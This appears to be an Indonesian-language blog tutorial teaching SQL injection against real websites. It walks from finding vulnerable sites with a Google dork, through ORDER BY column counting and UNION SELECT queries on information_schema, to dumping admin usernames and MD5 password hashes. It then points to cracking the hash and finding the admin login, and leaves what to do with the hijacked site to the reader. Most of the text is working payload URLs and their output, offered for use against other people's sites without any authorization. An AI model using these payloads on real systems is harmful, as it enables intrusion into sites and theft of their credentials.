SQL Injection

Bookmark and Share
SQL Injection, Sebelum mulai kita lebih baik mencari Tau dulu apa thu SQl injection…?????? Langsung ke Mbah kesayangan kita google :-P, , ,searching , ,searching, , , horeee ketemu. Nahh ini Dia
SQL Injection adalah sebuah aksi hacking yang sering dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Me : cara ini yang sering saya gunakan lho..?????


Bla.bla : lah orang kamu emank taunya thu ajja..heheh


Me : jiah diam-diam jangan di bongkar ( ketahuan dech)..
oke kita langsung saja…
                       
1.      Masukkan dork dibawah ini ke mbah google :
Inurl:galeri.php?id=  ( atau bisa juga pake dork lain , , tergantung kreativitas ente – ente pade, heheh kata” thu pernah saya terima dari 2 orang dalam beberapa menit L)

Nahh banyakan yang muncul di mbah google, , pilih salah satu..
contoh : website/blabla/galeri.php?id=13 (dan disini thu yang kita anggap sebagai target)

2.      Langkah berikutnya mencari kutu dari site tersebut dengan menambahkan karakter ‘ di akhir url site taget kita ..
Contoh : website/blabla/galeri.php?id=13’

Nahh kalau muncul “warning mysql sintaks error..blabla” berarti kita beruntung site tersebut ada kutunya…ok kita lanjut,,

3.      Di tahap ini kita akan mencari jumlah table pada database site target..
Menggunakan perintah “order by”..
Contoh : website/blabla/galeri.php?id=-13+order+by+1—

Kita mulai mencari jumlah tablenya (jika ngga ada error berarti bukan segitu jumlah table site target)
Misalnya : website/blabla/galeri.php?id=-13+order+by+1—(ga ada error)
website/blabla/galeri.php?id=-13+order+by+2—(ga ada error)
website/blabla/galeri.php?id=-13+order+by+3—(ga ada error)
website/blabla/galeri.php?id=-13+order+by+4—(ga ada error)
website/blabla/galeri.php?id=-13+order+by+5—(ga ada error)
website/blabla/galeri.php?id=-13+order+by+6—(error)
nahh berarti jumalah table site target kita adalah 5 (karena di 6 ada errornya)

4.      Tahap berikutnya mengeluarkan magic of number ( kata bang mellodiazz thu …tak copy :-P)
Contoh : website/blabla/galeri.php?id=-13+order+by+1,2,3,4,5—

Hohoho..keluar thu angkanya ..kita anggap yang keluar adalah angka 2 dibawahnya ada 4 dan di bawahnya 4 ada angka 5…
Nhh di situ lah kita letak username admin dan passwordnya. . . pilih salah satu dari ke tiga angka tersebut…di sini saya memilih angka 4 saja lah…

Untuk melihat versi Sqlnya, kita akan menggunakan perintah @@version, atau version () kemudian masukkan pada angka yang keluar tadi (yang tiga angka keluar tadi thu lhoo)
Contoh : website/blabla/galeri.php?id=-13+order+by+1,2,3,@@version,5—

Jrenggg….maka akan muncu versi sqlnya ..kalau yang muncul 4 , , berarti kita kurang beruntung kali ini, ,tapi jika yang keluar versi 5(horrrreeeeeeeeee…!!!!!!!!!!!!)..berarti kita bisa ke tahap berikutnya, .

5.      Untuk menampilkan semua isi table pada website target menggunakan perintah :
Group_concat+(table_name) >>di masukkan pada angka yang keluar tadi<<

From+information_schema.tables-- >>dimasukkan pada akhir angka<<

Contoh :
website/blabla/galeri.php?id=- 13+union+select+1,2,3,group_concat(table_name),5+from+ information_schema.tables—


maka akan keluar semua isi table database website tersebut, ,

6.      Nahh tahap yang ni di butuh kan ketelitian anda, , hehe, , kerena anda akan mencari table yang mengandung username sang admin dan passwordnya, , karena banyak tablenya masih dalam bentuk ascii, , kita harus mengkonversikan table tersebut ke bentuk hex, , search google, ,

Yang biasa saya konversikan tablenya seperti : admin,users, ,dll(tergantung sitenya heheh)
Kalau sudah di konversikan..kita mulai ngedumpnya. . .menggunakan perintah, ,
Group_concat(column_name) >>di letakan pada angka yang keluar<<
From+information_schema.columns+where+table_name=0xbentuk konversi table ascii ke hex >>di letakkan di belakang angka terakhir<<
Contoh :
website/blabla/galeri.php?id=-13+union+select+1,2,3,group_concat(column_name),5+from+infor
mation_schema.columns+where+table_name=0x61646D696E—
maka akan keluar isi tablenya misal isinya : id,username,pwd ,email

7.      Tahap yang terakhir,,, kita akan ngedump isi tablenya pada “culum_name” menggunakan perintah :

Group_concat(0x3a,username,0x3a,pwd) >>di angka yang keluar tadi<<
From+admin >>di letakkan di belakang angka terakhir<<
Contoh :

website/blabla/galeri.php?id=- 13+union+select+1,2,3,group_concat(0x3a,username,0x3a,pwd),5+from+admin—

jeng jeng jreeennnggggg…hahaha
yang akan keluar : admin:caa94f2662da768490629af7192a5831

username : admin

password : caa94f2662da768490629af7192a5831

jiah passwordnya panjeng banget dan aneh pula..????

kalau seperti thu berarti password website tersebut di enscrypt pake md5, , ,cari ajja dimbah google banyak kok…

kalau sudah di enscrypt md5nya..tinggal mencari tempat loginnya dech .. gunakan tools “adminfinder” untuk mempermudah anda..

ending ..
setelah login terserah kalian mau apakah site tersebut..saran saya jagan merusak website tersebut.hehhe

akhir kata kalau ada kesalahan dalam penulisan saya mohon maaf..

{ 0 komentar... Views All / Send Comment! }

Posting Komentar